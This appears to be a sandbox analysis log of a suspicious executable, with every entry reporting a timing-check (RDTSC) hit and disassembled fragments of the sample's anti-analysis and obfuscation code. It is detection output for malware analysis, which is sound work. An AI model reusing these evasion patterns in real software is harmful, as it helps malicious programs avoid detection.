Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B05B second address: 45B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F2DFC4C7108h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 cmc 0x00000026 push 00000000h 0x00000028 or dword ptr [ebp+122D2824h], edi 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 jmp 00007F2DFC4C7115h 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B0AC second address: 45B0BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2DFCDF7156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B0BE second address: 45B0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45B0C2 second address: 45B0DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45C2DA second address: 45C304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2DFC4C7116h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BA04 second address: 45BA1B instructions: 0x00000000 rdtsc 0x00000002 js 00007F2DFCDF7158h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F2DFCDF7156h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45C304 second address: 45C30B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BA1B second address: 45BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BA1F second address: 45BA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45CDA4 second address: 45CDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45CB91 second address: 45CB96 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D7F5 second address: 45D7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D7FB second address: 45D879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2DFC4C7116h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F2DFC4C7108h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+1247B11Bh], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F2DFC4C7108h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov esi, dword ptr [ebp+122D2E3Eh] 0x00000051 push 00000000h 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D5CD second address: 45D5D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D879 second address: 45D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D5D3 second address: 45D5F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2DFCDF7164h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D87D second address: 45D883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D5F1 second address: 45D5FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45D883 second address: 45D88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45E125 second address: 45E12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45EC33 second address: 45EC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45EE3F second address: 45EEE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F2DFCDF7156h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F2DFCDF7158h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub si, 910Bh 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+1245FEFAh], esi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F2DFCDF7158h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 cmc 0x00000059 xchg eax, ebx 0x0000005a jmp 00007F2DFCDF7162h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F2DFCDF7164h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45EC39 second address: 45EC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 461881 second address: 461885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 462946 second address: 46294C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46294C second address: 4629B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F2DFCDF7156h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F2DFCDF7158h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d movsx edi, di 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F2DFCDF7158h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c sub edi, dword ptr [ebp+1245FEFAh] 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 jno 00007F2DFCDF7158h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46393C second address: 463942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4600DE second address: 4600E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 462ACE second address: 462B50 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2DFC4C7114h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jc 00007F2DFC4C710Ch 0x00000011 or ebx, 486402DFh 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F2DFC4C7108h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 or dword ptr [ebp+1247E293h], esi 0x0000003e mov edi, dword ptr [ebp+122D38D0h] 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b stc 0x0000004c mov eax, dword ptr [ebp+122D170Dh] 0x00000052 push eax 0x00000053 cld 0x00000054 pop edi 0x00000055 push FFFFFFFFh 0x00000057 jnc 00007F2DFC4C710Bh 0x0000005d mov edi, 06D12179h 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push edx 0x00000066 pop edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 463B5D second address: 463B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4600E4 second address: 4600E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 465945 second address: 46598E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F2DFCDF7156h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, si 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+1245FD69h], ecx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F2DFCDF7158h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 add dword ptr [ebp+1247AFF7h], ecx 0x0000003c mov ebx, esi 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 464AC1 second address: 464AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46598E second address: 4659A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2DFCDF715Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 464AC5 second address: 464ACF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2DFC4C7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4659A6 second address: 4659B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 469752 second address: 469758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A716 second address: 46A71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A71A second address: 46A727 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2DFC4C7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A727 second address: 46A72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46DEF7 second address: 46DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007F2DFC4C710Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46DF19 second address: 46DF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46FE58 second address: 46FEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2DFC4C7108h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov di, 0465h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F2DFC4C7108h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D37B4h] 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d mov dword ptr [ebp+122D2EB1h], ecx 0x00000053 pop edi 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46FEBC second address: 46FEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2DFCDF7167h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 465B7E second address: 465B88 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2DFC4C710Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470F72 second address: 470F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470F76 second address: 470F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2DFC4C710Ch 0x0000000c jnp 00007F2DFC4C7106h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2DFC4C710Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470F99 second address: 470F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 465B88 second address: 465C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2DFC4C710Fh 0x0000000c nop 0x0000000d movsx edi, bx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 call 00007F2DFC4C7119h 0x0000001c mov ebx, dword ptr [ebp+122D38F4h] 0x00000022 pop ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F2DFC4C7108h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D02FDh] 0x0000004a push FFFFFFFFh 0x0000004c mov bh, 83h 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 jmp 00007F2DFC4C7111h 0x00000057 pop ebx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47413A second address: 474140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A942 second address: 46A946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A946 second address: 46A94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46A94C second address: 46A951 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4751F4 second address: 4751F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4751F8 second address: 4751FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46AA24 second address: 46AA2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477EE7 second address: 477EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477EEB second address: 477EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4795F6 second address: 47961D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7119h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F2DFC4C7120h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46E12B second address: 46E14B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 411ECA second address: 411EE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F2DFC4C7106h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2DFC4C710Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F197 second address: 46F19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46E14B second address: 46E153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46E203 second address: 46E207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470087 second address: 470095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470095 second address: 47009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47009A second address: 47009F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47009F second address: 47014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor ebx, dword ptr [ebp+122D39E4h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007F2DFCDF7169h 0x0000001a mov bl, C5h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 pushad 0x00000024 call 00007F2DFCDF7160h 0x00000029 movzx ebx, ax 0x0000002c pop edx 0x0000002d mov ecx, edi 0x0000002f popad 0x00000030 mov eax, dword ptr [ebp+122D065Dh] 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F2DFCDF7158h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 adc bx, FA82h 0x00000055 push FFFFFFFFh 0x00000057 movzx edi, cx 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007F2DFCDF715Dh 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F2DFCDF7164h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47348E second address: 4734AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4734AB second address: 4734B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 475473 second address: 475480 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2DFC4C7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47F7F4 second address: 47F839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F2DFCDF7162h 0x0000000f jmp 00007F2DFCDF715Ch 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F2DFCDF715Eh 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47F9D6 second address: 47FA1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F2DFC4C7117h 0x0000000a popad 0x0000000b je 00007F2DFC4C711Fh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jg 00007F2DFC4C7120h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FA1E second address: 47FA22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FC84 second address: 47FC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4154C0 second address: 4154F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d je 00007F2DFCDF7156h 0x00000013 jmp 00007F2DFCDF7160h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F2DFCDF7156h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4154F2 second address: 4154F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
